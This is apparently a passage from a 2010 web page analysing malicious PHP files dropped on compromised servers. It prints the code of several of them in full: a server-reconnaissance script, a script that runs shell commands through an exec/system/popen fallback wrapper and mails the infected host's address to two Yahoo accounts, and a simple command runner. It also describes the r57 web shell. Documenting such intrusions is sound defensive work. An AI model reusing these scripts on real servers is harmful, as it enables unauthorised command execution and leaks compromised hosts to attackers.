$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "UNITED ALBANIANS aka ALBOSS PARADISE<br>";
exit;
?>
id2.txt
<?php
$dir = @getcwd();
$ker = @php_uname();
echo "Mic22<br>";
$OS = @PHP_OS;
echo "<br>OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir); 
 ini_set("max_execution_time",-1);
 set_time_limit(0);
 $user = @get_current_user();
 $email = "$user";
 $assunto1 = "atividade-off";
 $assunto2 = "atividade-on";
 $email1 = "bstraq@yahoo.com";
 $email2 = "rocks.bsnet@yahoo.com"; 
 
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){ echo("Safe Mode of this Server is : "); echo("SafemodeOFF"); 
 if(mail($email1, $assunto1, $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'], $headers)){
 echo "<br>Opa, enviado! bstraq@yahoo.com<br>";
 }
 if(mail($email2, $assunto1, $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'], $headers)){
 echo "<br>Opa, enviado! rocks.bsnet@yahoo.com<br>";
 } 
} else{ ini_restore("safe_mode"); ini_restore("open_basedir"); if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){ echo("Safe Mode of this Server is : "); echo("SafemodeOFF"); 


}else{ echo("Safe Mode of this Server is : "); echo("SafemodeON"); 
 if(mail($email1, $assunto2, $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'], $headers)){
 echo "<br>Opa, enviado! bstraq@yahoo.com<br>";
 }
 if(mail($email2, $assunto2, $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'], $headers)){
 echo "<br>Opa, enviado! rocks.bsnet@yahoo.com<br>";
 } 
} }
function ex($cfe) {
  $res = ''; 
  if (!empty($cfe)) {
    if (function_exists('exec')) {
      @exec($cfe,$res);
      $res = join("\n",$res);
    } elseif ( function_exists('shell_exec')) {
      $res = @shell_exec($cfe);
    } elseif (function_exists('system')) {
      @ob_start();
      @system($cfe);
      $res = @ob_get_contents();
      @ob_end_clean();
    } elseif (function_exists('passthru')) {
      @ob_start();
      @passthru($cfe);
      $res = @ob_get_contents();
      @ob_end_clean();
    } elseif (@is_resource($f = @popen($cfe,"r"))) {
      $res = "";
      while(!@feof($f)) {
        $res .= @fread($f,1024);
      }
      @pclose($f);
    }
   }
   return $res;
} 
exit;
safeon.txt
<?php
echo "jimmywho";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
and the famous r57.txt
(so-called "Rip57 shell")
from AFTER-InFeRnUM@mail.com
A dark piece of dirty code of an unusually big size for a dropped file (102 KB),
giving the attacker a complete view over your system (and filesystem) from an abuse point of view.
Look at the end of the file for this banner:
PHP Injection Shell - last modified by Vassora@dalnet | BHT-CREW (http://baliemhekerforum.co.nr)
Harmless screenshots: r57.pdf (PDF, 32 KB)

Standard HTML 4+ :: last update: 2010-03-04 09:33:11 :: http://www.edainworks.com